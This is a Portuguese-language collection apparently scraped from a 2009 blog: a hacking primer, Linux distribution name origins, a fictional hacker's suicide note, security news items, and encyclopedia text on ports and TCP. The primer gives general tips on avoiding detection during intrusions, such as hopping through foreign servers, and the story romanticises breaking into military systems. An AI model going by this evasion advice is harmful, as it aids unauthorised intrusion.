Alguma vez, ja notou que pessoas com grandes egos sao idiotas ? Adivinhe por que
? Se voce acha que sabe
tudo, por que se encomodar em continuara aprendendo ? Um hacker tem um desejo in
saciavel por
informacao, sao obssesivos sobre tudo, sejam redes telefonicas, internet, comput
adores ou qualquer coisa. E
por este motivo que um hacker, constantemente, "explora" por mais informacao. En
tao voce precisa de tempo
livre para se dedicar ao aprendizado. E o que voce deve aprender ?

- Tomando Os Primeiros Passos


Um conceito errado sobre hackers e que voce deve ser um genio em programacao. Is
to nao e verdade! Claro,
que quanto mais voce souber melhor. Voce precisa realmente saber algum shell scr
ipting e linguagem C,
basicos. Aqui o que eu acredito ser o mais essencial no aprendizado de um hacker
: Primeiro, voce deve
aprender sobre o sistema operacional UNIX. Ele e um dos sistemas operacionais ma
is usados em servidores
na Internet. Acessando um sistema UNIX via Telnet ou um terminal de cliente, nao
ira apresentar-lhe uma
interface grafica interessante, e um ambiente de somente texto, como o DOS. Nao
ha graficos, apenas um
simples e extremamente eficiente sistema operacional que esta muito a frente de
seu tempo, desde quando
foi criado. E claro que voce podera encontrar o X-Windows em maquinas Unix e rod
ar uma enorme variedade
de aplicativos graficos, mas e irrelevante para esta discussao. Voce precisa ter
um conhecimento complexo
do sistema operacional. Sabendo como ele funciona em detalhes, e essencial. O co
digo-fonte e distribuido
gratuitamente para UNIX e seus variantes, e desta forma voce deve estuda-lo. Com
pre livros, procure pela
internet, consiga informacoes de todas as fontes que puder. Apenas esteja apto a
usar o UNIX como se o
usasse por toda a sua vida. Muitas pessoas esquecem as licoes basicas e acham qu
e precisam aprender
apenas sobre as medidas de seguranca do sistema operacional. Isto e futil, como
voce podera "penetrar" em
um sistema se voce nao sabe usa-lo para simples tarefas rudimentares, como troca
r diretorios, listar arquivos,
ver quem esta conectado, etc,... Alem disso, como mencionei anteriormente, voce
precisa ter experiencia em
shell scripting. Quanto melhor nisso, voce for, melhor e mais completo hacker vo
ce sera. Saber tambem um
pouco de linguagem C e tambem imperativo, desde que voce ira precisar de alterar
codigos, programacao de
socket para a tecnica de spoofing e ataques fragmentados,... Uma vez que voce sa
iba os fundamentos do
UNIX, aprenda sobre as suas funcoes primarias de rede com protocolos da Internet
. E essencial entender
como um computador comunica-se com outro pela Internet. O proximo passo e aprend
er especialmente sobre
seguranca em sistemas UNIX, que incluem o design das permissoes de acesso e fire
wall. Novamente, todas
estas informacoes podem ser encontradas nas magicas coisas chamadas livros.
Agora que voce tem um entendimento total sobre UNIX, voce podera aprender como c
ontornar a seguranca
nestes sistemas. Existem varios arquivos na Internet tratando sobre os ultimos b
ugs, como o bugtraq e
8lgm.org. Comece a mater uma trilha imaginaria nas falhas em varios servicos, e
entao quando voce
inspecionar um sistema ele ira surgir em sua mente.

- A Psicologia de Hacke(ar)
E importante entender como o cerebro humano funciona em outras pessoas. Para se
ter uma ideia de como
comprometer a seguranca de computadores, voce deve "penetrar" na mente do admini
strador do sistema e
pensar como voce protegeria o sistema se fosse o encarregado. Voce deve tambem l
evar em consideracao
que a muitas das pessoas sao estupidas, e isto sera decisivo se voce estiver ten
tando descobrir algumas
senhas. Use o senso comum.

- Nunca Pare de Aprender


Nao pare aqui! Depois de entender sobre redes e UNIX, continue aprendendo mais.
O que sobrou ?
VAX/VMS, que e outro sistema operacional encontrado em alguns computadores conec
tados na Internet.
Voce pode comecar explorando o mundo da criptografia (o que e suicidio se voce o
deia matematica).
Mantenha-se atualizado nos novos desenvolvimentos em tecnologia. Simplificando:
aprenda tudo o que puder
todo dia.
Eis algumas abilidades de Kevin Mitnick (talvez o mais famoso hacker de todos os
tempos): VM/CMS,
OS/VS1, DOS/VSE, MS-DOS, RST/E, VAX/VMS, UNIX, TOP-20,... Familiarizado com algu
m destes ? Isto so
nos faz pensar em uma coisa, vamos estudar!!!

- Fazendo a Conexão
Constantemente, escuta-se uma pergunta MUITO comum dos iniciantes: "Como eu me c
onecto a um sistema
?" ou "Como eu uso o Telnet ?" Para explicar algumas questões basicas: Voce pode s
e conectar com
qualquer maquina ligada na Internet com um programa de Telnet. Muitos programas
utilizam o servico de telnet
quando voce conecta-se a uma maquina. Por exemplo, se eu rodar meu programa e co
nectar com o xyz.com,
ele ira me conectar com a porta 23, a porta da Telnet do xyz.com. Telnet, simple
smente, e um meio de se usar
um terminal UNIX, como se voce estivesse sentado em frente a um. Imagine estar d
iscando em uma maquina
em ambiente DOS e recebendo o prompt C:\>. E essencialmente a mesma coisa. Quand
o voce aprender
sobre UNIX, voce vera que existem outros servicos (tambem conhecido como dameons
), e podera usar um
programa de Telnet para conectar-se a varios deles. Onde encontrar tais programa
s ? Que tal em
www.tucows.com, eles possuem varios deles.

Se voce puder instalar uma variacao do UNIX como o LINUX em seu computador, eu c
ertamente sugiro-lhe
que o faca. Este e o melhor caminho para aprender o sistema operacional. Alem di
sso, o LINUX possui
excelentes utilitarios que o acompanham, como o GNU C compiler.

Também e importante identificar um erro comum que os iniciantes cometem quando apr
endem por arquivos
de texto. Nao confundam TELENET com TELNET. TELENET e uma grande rede de servido
res, agora
também conhecido como SprintNet. Possui um sistema operacional especial e e acessa
do por numeros de
acesso discado com um programa de terminal. Uma vez conectado voce pode acessar
diferentes servidores
pelo seu NUA (Network User Address). Hacke(ar) em redes como SprintNet/Telenet e
uma pratica arriscada,
por ser facilmente rastreada. Voce esta discado diretamente na rede de sua linha
telefonica. Novamente, um
servidor pode simplesmente gravar o seu endereco IP se voce conectar-se na Inter
net e usar a identificacao
de cliente para possivelmente conseguir o seu username do seu provedor.

- Como Nao Ser Pego


O erro que provavelmente todo hacker comete e que ele ou ela torna-se muito conv
encido ou popular. Nao
saia gritando que e um hacker na escola. Confie em menos pessoas posiveis. Quant
o menos pessoas
souberem que voce esta nisso, melhor. Nao faca coisas idiotas, como hacke(ar) da
sua propria casa a algum
sistema de alta seguranca. Embora este metodo esta agora, "fora de moda", desde
que existem meios mais
faceis de esconder sua identidade quando hack(eando) pela Internet. Existem vari
os meios para dificultar o
rastreamento quando hack(eando) sistemas da Internet. Um deles, e conectar-se em
diversos servidores com
Telnet antes de acertar o seu alvo. Isto tornara o rastreamento muito mais dific
il. Tente conectar-se a sistemas
localizados em outros paises. Nunca tente hack(ear) uma instituicao governamenta
l, voce ira ser pego e ira
para a cadeia! Nao seja estupido achando ser bom demais para ser pego. Nunca fal
e sobre hack(ear) ao
telefone principalmente nos sem fio, voce nunca sabe quem esta ouvindo. Encripte
suas mensagens de e-mail.
Seja um pouco paranoico! Quanto mais paranoico voce for, menos chance voce tera
de ser pego.

- Último, mas MUITO importante


Sempre digo que conhecimento e apenas metade do que faz um hacker. A outra metad
e e a etica. Voce pode
ser um perfeito genio, mas se nao tiver etica, voce esta no mesmo nivel de um cr
iminoso. Todo hacker possui
um codigo de etica.
Você não é um hacker se
- Voce pirateia software
- Voce espalha viroses (qualquer um com um pouco de conhecimento de Assembler po
de criar um virus)
- Voce deleta arquivos alheios e destroi seus sistemas (qualquer um pode deletar
um arquivo)
- Voce rastreia empresas de cartao de credito ou bancos para conseguir dinheiro.

quantos sistemas operacionais existem


Posted on novembro 6, 2009 by juancarloscunha
quantos sistemas operacionais
existem
OpenSuSE
Antes de ter o nome OpenSuSE, a distribuição tinha o nome de SuSE Linux, sendo que e
xiste uma outra distribuição Linux chamada SuSE Linux Enterprise. A mudança de SuSE Li
nux para OpenSuSE foi justamente para não haver confusão quando alguém se referia a um
a das distribuições apenas pelo nome SuSE .
S.u.S.E é o acrônimo alemão de: Software- und System-Entwicklung (desenvolvimento de sof
tware e de sistemas). Esse era o nome da empresa que desenvolvia o OpenSuSE, que
na época era uma tradução do Slackware Linux para alemão.
Porém há quem diga que o nome SuSE é uma homenagem ao pioneiro da computação na Alemanha K
onrad Suze.
Fedora
Como muitos sabem, Fedora é uma distribuição criada pela RedHat (chapéu vermelho). O nom
e RedHat é uma referência ao boné vermelho do time de Lacrosse da Universidade Cornell
.
Obs.: Essa informação foi conseguida aqui.
E Fedora é o nome de um modelo de chapéu
Será que já deu para perceber? Acontece que o chapéu vermelho que vemos no logo da Red
Hat é do tipo Fedora. Daí a origem do nome dessa distribuição, criada pela RedHat.
Para mais informações sobre a origem do nome Fedora, consulte o seguinte artigo: A O
rigem do Nome Fedora
Debian GNU/Linux
O nome da distribuição Debian (pronuncia-se débian ) tem sua origem nos nomes dos seus cr
iadores: Debra e Ian Murdock, que são casados.
A distribuição foi lançada em 1993 e é a distribuição oficial do projeto GNU.
Mandriva
O nome da distribuição Mandriva vem da união de duas empresas: a francesa Mandrake e a
brasileira Conectiva. Antes dessa fusão, cada empresa era responsável pelo desenvol
vimento de uma distribuição Linux diferente.
Hoje a empresa possui uma sede administrativa em Paris e um centro de desenvolvi
mento em Curitiba.
Slackware
A distribuição Slackware tem esse nome como uma referência ao termo slack , usado pela Ig
reja de Subgenius (Church of SubGenius).
Mas o que é slack e o que é Igreja de Subgenius?
Igreja de Subgenius é uma pseudo-religião que satiriza outras religiões e crenças que en
volvem conspirações mundiais, extra-terrestres etc.
o Informações sobre a Igreja dos Subgênios
o Página oficial da Igreja de Subgenius
o Blog da Igreja de Subgenius em português
O símbolo dessa religião é o Bob com cachimbo , daí a origem do símbolo Tux com cachimbo
ascote da distribuição Slackware!
Slack
é um termo muito utilizado na Igreja de Subgenius. Na verdade slack é o termo que defi
ne a crença central da Igreja de Subgenius. Geralmente o termo significa sentiment
o de liberdade, de independência e um pensamento original que surge quando você atin
ge os seus objetivos pessoais.
A Igreja afirma que todos nascemos com o Slack Original, mas este nos foi roubad
o por uma conspiração mundial de pessoas normais, os pinks .
Com isso chegamos à conclusão de que o nome Slackware é uma referência ao slack , ou seja,
ao sentimento de liberdade, originalidade e independência. Seria algo como: não pense
como os outros (pinks), seja original e independente .
Kurumin
Kurumin é o nome de uma das mais famosas distribuições Linux brasileiras. Seu nome vem
de curumim , do tupi-guarani, língua indígena, que significa criança e começa com a let
referência à distribuição Knoppix, que serviu de base para ela.
O mascote do Kurumin é um pinguim indígena. É uma distribuição criada para usuários inician
es, de fácil uso, por isso a referência à criança . A distribuição foi descontinuada em 20
Knoppix
Knoppix é uma distribuição baseada na distribuição Debian e que tem seu nome tirado de uma
derivação do nome do seu criador: Klaus Knopper, com a influência do nome Unix, que é o
sistema do qual o Linux se originou.
O seu símbolo faz referência ao desenho do Homem Vitruviano de Leonardo da Vinci. Es
se desenho é baseado nos conceitos do arquiteto Marco Vitruvio Polião que viveu no séc
ulo I a.C e mostra a perfeição geométrica das medidas do homem baseadas na proporção áurea.
Arch Linux
Arch Linux, ou apenas Arch, é uma distribuição cujo nome nada mais é que o substantivo ar
ch , que significa arco em inglês. Substantivo usado como radical em palavras como ar
chitecture (arquitetura).
Um dos diferenciais dessa distribuição é a sua otimização para processadores de arquitetur
as i686 ou superiores. Arch se pronuncia ártch , como na palavra archer (arqueiro).
Seu símbolo lembra uma pirâmide (uma maravilha arquitetônica), mas com um arco na base
que acaba formando, no conjunto, algo semelhante a letra A (de Arch Linux). Seu l
ema é Keep it simple, keep it lightweight (mantenha-o simples, mantenha-o leve), que
é um lema baseado no princípio KISS (keep it simple, stupid), seguido por distribuições
como Slackware.
FreeBSD
FreeBSD não é Linux, mas é um sistema baseado no BSD, que por sua vez é um sistema do ti
po Unix. A origem do nome FreeBSD e BSD se misturam. BSD vem de Berkeley Softwar
e Distribution, algo como: programa de distribuição de Berkeley. O nome é apropriado já
que esse sistema foi desenvolvido na Universidade de Berkeley.
O FreeBSD é apenas uma das diversas variações desse sistema. o Free significa livre em i
nglês, pois trata-se de um sistema operacional livre. Seu mascote é um diabinho verm
elho que se chama Daemon (demônio em grego), isso devido ao fato do sistema utiliz
ar daemons, que são programas executados na memória e que atendem requisições do process
ador. Seu lema é The power to serve , o poder para servir. Sistema muito utilizado em
servidores.
Conectiva
Conectiva é o nome de uma distribuição brasileira que não existe mais. A Conectiva se fu
ndiu com a Mandrake e criaram a distribuição Mandriva. Conectiva é um nome que lembra
conectividade.
Mandrake
Mandrake era o nome de uma distribuição Linux, que agora é conhecida como Mandriva (fu
são de Mandrake com Conectiva). Mandrake, o mágico, é o nome de um personagem de quadr
inhos dos anos 30, do mesmo criador do personagem Fantasma. O símbolo dessa distri
buição é um Tux com capa e cartola, as mesmas vestes do Mandrake, o mágico.
Puppy Linux
Puppy Linux é uma distribuição leve e live-CD (não precisa instalar no HD, funciona dire
to no CD). Puppy significa filhote em inglês. Seu objetivo é ser isso mesmo, um filhot
e, ou seja, pequeno e atraente.
Existem algumas versões que são variações do Puppy como o Chubby Puppy (filhote gordinho
) que vem com programas mais pesados como o OpenOffice; Barebones Puppy (algo co
mo: filhote esquelético) que não tem ferramentas gráficas e Puppy Unleashed (filhote s
eparado?) que permite ao usuário escolher os aplicativos que comporão o live-CD.
Linux Mint
Linux Mint é uma distribuição baseada na distribuição Ubuntu. Mint significa hortelã em i
considerado um sabor refrescante e agradável. Seu objetivo é ser uma distribuição de fácil
uso. Seu tema padrão é verde, cor sempre associada ao sabor hortelã (menta) nos produ
tos alimentícios. Seu símbolo lembra uma folha verde.
Big Linux
Big Linux tem o objetivo de ser uma distribuição completa para desktops. Atende toda
s as necessidades do usuário final, diferente de algumas distribuições em que o usuário
precisa montar o sistema aos poucos.
Big Linux possui uma grande quantidade de programas já instalados, daí o seu nome: B
ig Linux (Grande Linux).
GoblinX
GoblinX é uma distribuição live-CD baseada na distribuição Slackware. Seu lema é GoblinX L
x, Porque Beleza é Fundamental . Seu objetivo é também proporcionar uma sensação agradável
ido sua aparência. Algo um tanto estranho quando analisamos a origem do seu nome.
Goblin é o nome de uma criatura de fantasia (normalmente encontrada em histórias de
fantasia medieval) que são feias, normalmente verdes e narigudas. o X , no nome, supõe-
se que seja devido ao Linux/Unix. Seu símbolo tem a figura de um Goblin.
Damn Small Linux
Damn Small Linux, também conhecida como DSL é uma distribuição live-CD que tem por objet
ivo ser muito pequena e leve. Daí a origem de seu nome que significa algo do tipo:
Linux danado de pequeno! .
Sua imagem ISO tem menos de 50MB, no entanto é um sistema completo. Seu símbolo poss
ui a imagem de um pequeno pinguim.
Publicado emnoticias, outro assunto | Colocado tagexistentes, sistemas operacion
ais | 1 Comentário
historia de um hacker,cartilha de um hacker,conto de um hacker,texto de um hacke
r
Posted on setembro 12, 2009 by juancarloscunha
Leia com muita atenção o texto abaixo, pois é a historia de como amei a vida e porque
desisti dela (autor desconhecido).
Um adolescente normal como qualquer outro, mas com uma visão da vida pela qual mui
tos teriam o invejado, ele não tinha muitos amigos mas era feliz, ele não tinha uma
relação com seus irmãos da maneira tradicional (ou são os melhores amigos ou os piores i
nimigos). Recebeu uma criação invejável, podia sair e voltar de casa a hora que quises
se, e recebia dos pais toda a atenção que necessitava. Apesar disso não saia de casa c
om a freqüência de um adolescente normal, não pelo fato de ser anti-social, muito pelo
contrario fazia amizades muito fácil, e também não era um nerd, muito pelo contrario
era o tipo do aluno vagal do qual os professores se reuniam para falar mau, gost
ava de entrar em brigas e odiava ir para a escola aprender as mesmas coisas todo
dia. As coisas entravam muito fácil em sua cabeça, bastava uma ou duas vezes e pron
to já estava decorado. Odiava a historia com tanta injustiça, escravidão dos negros (a
pesar dele ser branco), preconceito contra índios, judeus ou estrangeiros. Esse ga
roto que não tinha uma vida muito agitada, cheia de amigos e viagens. Sempre agrad
ecia a deus pôr Ter uma vida tão boa, era feliz, fazia o que gostava, não tinha nenhuma
doença , seus pais e familiares estavam vivos e com saúde e acreditava Ter nascido n
o ano certo pois estava acompanhando todo o desenvolvimento da tecnologia. Ele t
inha uma vida que para outras pessoas de sua idade seria o maior tédio (mas ele ad
orava), Seu único medo era saber do inevitável que um dia isso iria acabar. Talvez co
m a morte dos pais ou com um acidente que deixaria ele incapacitado. Esse garoto
um dia se deparou com uma maquina incrível que quase não tinha limites se bem utili
zada um computador. Ele estudou muito, se formou duas vezes (Engenharia da comput
ação e ciência da computação) eu nem preciso dizer que ele era um Hacker. Seu nome não inte
essa, o que ele tinha em mente? Mudar o mundo, um hacker solitário que durante doi
s anos (logo após a segunda formatura) se dedicou a invadir e roubar informações confi
denciais dos militares americanos. Ele tinha em mente roubar informações, entender e
ssas informações e depois divulga-las. Ele quase consegue alcançar o seu objetivo. Ele
reuniu algumas informações que vão de fotos de possíveis alienígenas até plantas de equipa
entos como computador, só que com uma tecnologia que possivelmente só estará disponível
ao publico daqui a dez anos. Seu erro foi que depois de invadir sistemas militar
es os quais não podia ficar dentro mais de um minuto, ele ficou auto confiante dem
ais, e quando estava em casa montando uma pequena home page que iria mostrar ao
publico todas as informações que ele roubou, foi parado pôr agentes federais que o peg
aram as 3:40h de algum dia do ano de 1996.
Você não vai encontrar nos jornais sobre mim, apenas algumas linhas que dizem policia
pega vândalo destruindo telefones públicos e descobre em sua casa centenas de cartões
de créditos falsos . Eu NUNCA falsifiquei NENHUM cartão de credito, meu único ato crimi
noso foi invadir sistemas do governo e copiar informações confidenciais. Fui condena
do a 7 anos de prisão sem direito a condicional, e fui proibido de usar computador
es para o resto da vida. Outro dia eu li no jornal sobre dois garotos que matara
m um mendigo queimado enquanto dormia, e que um deles era filho de um juiz crimi
nal. Hoje pego o jornal e leio Garotos confessam o crime mas não vão a julgamento . Che
ga eu cansei de viver em um mundo onde assassinos ficam nas ruas enquanto aquele
s que estão em busca de um mundo melhor ficam na cadeia, cansei de Ter que aceitar
o fato de que estou privado daquilo que eu amo e faço melhor, ser um hacker Cansei
de saber que os nossos governantes querem um povo ignorante o qual eles possam
manipular e enganar, dizendo que estamos na terra da liberdade. Um pais que tem
uma tecnologia dez anos afrente da atual, que se fosse mostrada ao publico não adi
antaria o mundo em dez anos, mas com as novas descobertas em cima dessa tecnolog
ia poderiam levar o mundo 20 talvez 30 anos afrente. Estou cansado de viver em u
m mundo onde o nosso próprio governo nos nega uma evolução, para poder Ter os melhores
equipamentos militares que garantem a sua superioridade perante os outros países.
Agora eu pergunto, como com tudo isso eles ainda podem falar sobre globalização? Ho
je eu tenho vergonha de ser americano.
Agora só me resta a esperança de que um dia, os Hackers do mundo se uniram e mostrara
m ao mundo A verdade.
Quando vocês lerem isto eu já estarei morto, mas como suspiro final, digo que tenho
copias escondias de tudo que descobri, e a mesma pessoa que colocara o meu manif
esto na rede também colocara todas as informações pelas quais eu fui preso.
Agora eu morro feliz pois a verdade em breve estará na boca do povo!
Ass:
O hacker foi encontrado em sua cela com os pulsos cortados, foi levado ao hospit
al do presidio onde morreu as 04:32h do dia primeiro de janeiro de 1998. O seu a
migo que ficou encarregado de colocar seu manifesto e as outras informações na rede,
foi até o local indicado, onde estariam as copias dos arquivos confidenciais, mas
foi pego pela policia federal e respondeu a processo. Foi obrigado a pagar mult
a no valor de US$ 80.000.
O texto acima é de autor anônimo.
Publicado emnoticias | Colocado tagcarta, cartilha, conto, de, hacker, um | 1 Co
mentário
Falhas no flash,vulnerabilidades no flash,bugs no flash, nove em cada dez usuários
Posted on agosto 3, 2009 by juancarloscunha
Essa informação vem da empresa de segurança dinamarquesa Secunia. Vulnerabilidades do
programa multimídia se estendem para usuários de Mac OS e Linux.
Nove em cada dez usuários de Windows estão vulneráveis a falhas no programa multimídia F
lash Player, da desenvolvedora norte-americana Adobe Systems.
As versões 9.0.159.0 e 10.0.22.87 do Flash expõem os internautas a ataques. Segundo
especialistas, o problema foi detectado há sete meses e atinge os usuários dos siste
mas operacionais Windows, Mac OS e Linux . Uma correção deve ser divulgada na quint
a-feira (30/7/2009).
De acordo com empresa de segurança dinamarquesa Secunia, 92% dos 900 mil usuários de
Windows que usaram seu programa Personal Software Inspector (PSI) recentemente
usam o aplicativo Flash Player 10 em seus PCs, enquanto 31% têm o Flash Player 9 i
nstalado. O total vai além de 100% porque alguns usuários têm ambos em sua máquina.
O bug se estende ao componente authplay.dll , dos softwares Adobe Reader e Acrobat
que têm a função de intérprete entre conteúdos em Flash embutidos em arquivos no formato
PDF.
Até a correção que deve ser apresentada nesta semana, a Adobe diz que os usuários podem
apagar ou renomear o componente authplay.dll , ou então desabilitar a renderização do Fla
sh para evitar ataques com arquivos em PDF corrompidos.
Fonte: computerworld.uol.com.br/seguranca/
Publicado emnoticias | Colocado tagbugs no flash, falhas, flash | 1 Comentário
falhas no ubuntu-linux, falha grave no kernel que permite acesso remoto
Posted on agosto 3, 2009 by juancarloscunha
Esse é para quem usa o kernel do Windows desatualizado.
Bug permite que invasor execute códigos e realize ataque de negação de serviço. O sistem
a operacional Ubuntu possui uma falha em seu kernel que permite o acesso a dados
sensíveis de seus usuários, revelou o distribuidor de Linux,
Com a falha, relacionada à função NULL-pointer do código do kernel, o invasor consegue e
xecutar códigos remotamente. Dessa forma, é possível incluir novos dados em diretórios já
apagados, ocupando espaço em disco e memória e levando os usuários a se tornarem vítima
de um ataque de negação de serviço. Aqueles usuários que possuem o ubuntu desatualizado.
devem atualizar o sistema operacional imediatamente.
Fonte: http://computerworld.uol.com.br/seguranca
Publicado emnoticias | Colocado tagacesso, falha, kernel, no, remoto, ubuntu | 1
Comentário
quem comprou pirate bay, qual empresa comprou o pirate bay, pirate bay processad
o, Empresa compra site de downloads Pirate Bay
Posted on junho 30, 2009 by juancarloscunha
É preciso compensar provedores de conteúdo , diz Global Gaming Factory.
Site condenado por quebra de copyright foi comprado por US$ 7,8 milhões.
A empresa sueca Global Gaming Factory (GGF) anunciou nesta terça-feira (30) a aqui
sição do site de downloads Pirate Bay pelo equivalente a US$ 7,8 milhões. O site de co
mpartilhamento de arquivos via torrent está entre os 100 mais visitados no mundo e
foi condenado, em abril, por quebra de direitos autorais.
Leia também: Criador do Pirate Bay fala sobre a condenação do site
Em comunicado, a GGF afirmou que o site precisa de um novo modelo de negócios para
sobreviver.
Gostaríamos de introduzir modelos de negócios que assegurem o pagamento a provedores
de conteúdos e detentores de direitos autorais sobre materiais baixados pelo site ,
disse Hans Pandeya, diretor-executivo da Global Gaming Factory.
Segundo a empresa, um novo modelo de compartilhamento de arquivos está a caminho. C
riadores e provedores de conteúdo precisam controlar seu material e também serem pag
os por ele. Os usuários precisam de downloads mais rápidos e mais qualidade , diz o co
municado.
Novos rumos
Um comunicado no blog do Pirate Bay comenta a aquisição, dizendo que está sendo vendid
o por um preço abaixo de seu valor e que dinheiro não é o que importa .
A parte interessante é ter as pessoas certas e com a atitude certa administrando o
site. Na internet, o que não evolui morre , diz o texto.
O comunicado do Pirate Bay informa que os lucros da venda serão destinados a ajuda
r projetos de liberdade de expressão e abertura na rede.
http://thepiratebay.org/
Publicado emnoticias, outro assunto | Colocado tagdownload, pirate bay | 1 Comen
tário
site ministerio do trabalho invadido, crackers que invadiram o site ministerio d
o trabalho
Posted on junho 20, 2009 by juancarloscunha
Por isso que eu falo, tem tonto pra tudo! qualquer um de nós podemos cair num emai
l besta desse Imagina só um email com as fotos que voce pediu? aiaiai
Quando recebo esse tipo de e-mail, normalmente verifico os links para avisar os
administradores dos websites. Para minha surpresa, o primeiro link vai direto pa
ra um website da editora McGraw-Hill. Um script de redirecionamento escrito em P
HP redireciona para um website do Ministério do Trabalho. Lá está hospedado o arquivo
malicioso.
Aguardei a remoção do arquivo e durante a escrita desse post, eles finalmente retira
ram o maldito do ar.
O e-mail foi esse abaixo.

Porta (informática)
Porta é um ponto físico (hardware) ou lógico (software), no qual podem ser feitas cone
xões, ou seja, um canal através do qual os dados são transferidos entre um dispositivo
de entrada e o processador ou entre o processador e um dispositivo de saída. Uma
porta de software é uma conexão virtual que pode ser usada na transmissão de dados. As
mais comuns são as portas TCP e UDP, que são usadas para conexão entre os computadore
s e a Internet. Já uma porta de hardware serve como elemento de ligação entre um compu
tador e outro, ou entre um computador e um periférico. Fisicamente, uma porta é a pa
rte de um equipamento na qual se conecta um plug ou um cabo.
O uso do termo "porta", em informática, deriva da tradução de um falso cognato port, q
ue em inglês significa "porto". A semelhança física é com os portos náuticos onde os mesmo
atracam e permitem a transferência de mercadorias e pessoas. Neste caso o porto i
nformático permite o fluxo de informação. Porém, mesmo com a tradução incorreta, o nome "po
ta" foi bem assimilado pela língua portuguesa, pela analogia que se pode fazer com
a porta de uma casa, por exemplo: uma porta, em informática, é o ponto de entrada d
e um dispositivo externo no computador.
Hardware O hardware, circuitaria, material ou ferramental. É a parte física do compu
tador, ou seja, é o conjunto de componentes eletrônicos, circuitos integrados e plac
as, que se comunicam através de barramentos.Em complemento ao hardware, o software
é a parte lógica, ou seja, o conjunto de instruções e dados processado pelos circuitos
eletrônicos do hardware. Toda interação dos usuários de computadores modernos é realizada
através do software, que é a camada, colocada sobre o hardware, que transforma o com
putador em algo útil para o ser humano. Além de todos os componentes de hardware, o
computador também precisa de um software chamado Sistema Operacional. O Sistema Op
eracional torna o computador utilizável. Ele é o responsável por gerenciar os disposit
ivos de hardware do computador (como memória, unidade de disco rígido, unidade de CD
) e oferecer o suporte para os outros programas funcionarem (como Word, Excel et
c).
O termo hardware não se refere apenas aos computadores pessoais, mas também aos equi
pamentos embarcados em produtos que necessitam de processamento computacional, c
omo o dispositivos encontrados em equipamentos hospitalares, automóveis, aparelhos
celulares (em Portugal portáteis), entre outros.
Na ciência da computação a disciplina que trata das soluções de projeto de hardware é conhe
ida como arquitetura de computadores.
Para fins contábeis e financeiros, o hardware é considerado um bem de capital.
Software. Software, logiciário ou suporte lógico é uma sequência de instruções a serem seg
idas e/ou executadas, na manipulação, redirecionamento ou modificação de um dado/informação
ou acontecimento. Software também é o nome dado ao comportamento exibido por essa se
qüência de instruções quando executada em um computador ou máquina semelhante além de um pr
duto desenvolvido pela Engenharia de software, e inclui não só o programa de computa
dor propriamente dito, mas também manuais e especificações. Para fins contábeis e financ
eiros, o Software é considerado um Bens de capital.
Este produto passa por várias etapas como: análise econômica, análise de requisitos, esp
ecificação, codificação, teste, documentação, Treinamento, manutenção e implantação nos amb
portas
Transmission Control Protocol
navegaçãopesquisa
Protocolos Internet (TCP/IP)
Camada Protocolo
5.Aplicação
HTTP, SMTP, FTP, SSH, Telnet, SIP, RDP, IRC, SNMP, NNTP, POP3, IMAP, BitTorrent,
DNS, Ping ...
4.Transporte
TCP, UDP, RTP, SCTP, DCCP ...
3.Rede
IP (IPv4, IPv6) , ARP, RARP, ICMP, IPsec ...
2.Enlace
Ethernet, 802.11 WiFi, IEEE 802.1Q, 802.11g, HDLC, Token ring, FDDI, PPP,Switch
,Frame relay,
1.Física
Modem, RDIS, RS-232, EIA-422, RS-449, Bluetooth, USB, ...
O TCP (acrônimo para o inglês Transmission Control Protocol) é um dos protocolos sob o
s quais assenta o núcleo da Internet. A versatilidade e robustez deste protocolo t
ornou-o adequado a redes globais, já que este verifica se os dados são enviados de f
orma correta, na sequência apropriada e sem erros, pela rede.
O TCP é um protocolo do nível da camada de transporte (camada 4) do Modelo OSI e é sob
re o qual assentam a maioria das aplicações cibernéticas, como o SSH, FTP, HTTP portan
to, a World Wide Web.
Características técnicas
Cabeçalho de uma trama TCP
+ Bits 0 - 3 4 - 9 10 - 15 16 - 31
0 Porta na origem Porta no destino
32 Número de sequência
64 Número de confirmação (ACK)
96 Offset Reservados Flags Janela
Window
128 Checksum Ponteiro de urgência
160 Opções (opcional)
Padding (até 32)
224
Dados
Detalhe do campo Flags
+ 10 11 12 13 14 15
96 UrgPtr ACK Push RST SYN FIN
As características fundamentais do TCP são:
Orientado à conexão - A aplicação envia um pedido de conexão para o destino e usa a
" para transferir dados.
Ponto a ponto - uma conexão TCP é estabelecida entre dois pontos.
Confiabilidade - O TCP usa várias técnicas para proporcionar uma entrega confiável
pacotes de dados, que é a grande vantagem que tem em relação ao UDP, e motivo do seu
uso extensivo nas redes de computadores. O TCP permite a recuperação de pacotes perd
idos, a eliminação de pacotes duplicados, a recuperação de dados corrompidos, e pode rec
uperar a ligação em caso de problemas no sistema e na rede.
Full duplex - É possível a transferência simultânea em ambas direções (cliente-serv
ante toda a sessão.
Handshake - Mecanismo de estabelecimento e finalização de conexão a três e quatro t
, respectivamente, o que permite a autenticação e encerramento de uma sessão completa.
O TCP garante que, no final da conexão, todos os pacotes foram bem recebidos.
Entrega ordenada - A aplicação faz a entrega ao TCP de blocos de dados com um taman
o arbitrário num fluxo (ou stream) de dados, tipicamente em octetos. O TCP parte e
stes dados em segmentos de tamanho especificado pelo valor MTU. Porém, a circulação do
s pacotes ao longo da rede (utilizando um protocolo de encaminhamento, na camada
inferior, como o IP) pode fazer com que os pacotes não cheguem ordenados. O TCP g
arante a reconstrução do stream no destinatário mediante os números de sequência.
Controle de fluxo - O TCP usa o campo janela ou window para controlar o fluxo. O
receptor, à medida que recebe os dados, envia mensagens ACK (=Acknowledgement), c
onfirmando a recepção de um segmento; como funcionalidade extra, estas mensagens pod
em especificar o tamanho máximo do buffer no campo (janela) do segmento TCP, deter
minando a quantidade máxima de bytes aceita pelo receptor. O transmissor pode tran
smitir segmentos com um número de bytes que deverá estar confinado ao tamanho da jan
ela permitido: o menor valor entre sua capacidade de envio e a capacidade inform
ada pelo receptor.
[editar] Descrição do funcionamento

Fig. 1 - Neste exemplo considera-se o backlog preenchido para forçar o timeout no


cliente para que o pacote SYN seja reenviado. No entanto, o primeiro pacote podi
a ter-se perdido devido a erros na rede.
O protocolo TCP especifica três fases durante uma conexão: estabelecimento da ligação, t
ransferência e término de ligação. O estabelecimento da ligação é feito em três passos, enq
que o término é feito em quatro. Durante a inicialização são inicializados alguns parâmetr
s, como o Sequence Number (número de sequência) para garantir a entrega ordenada e r
obustez durante a transferência.
[editar] Estabelecimento da ligação
Tipicamente, numa ligação TCP existe aquele designado de servidor (que abre um socke
t e espera passivamente por ligações) num extremo, e o cliente no outro. O cliente i
nicia a ligação enviando um pacote TCP com a flag SYN activa e espera-se que o servi
